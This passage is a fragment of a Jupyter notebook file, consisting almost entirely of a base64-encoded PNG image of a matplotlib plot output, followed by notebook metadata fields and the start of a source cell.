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\n",
"text/plain": [
"<matplotlib.figure.Figure at 0x7fc7a72a3cf8>"
]
},
"metadata": {},
"output_type": "display_data"
}
],
"source": [
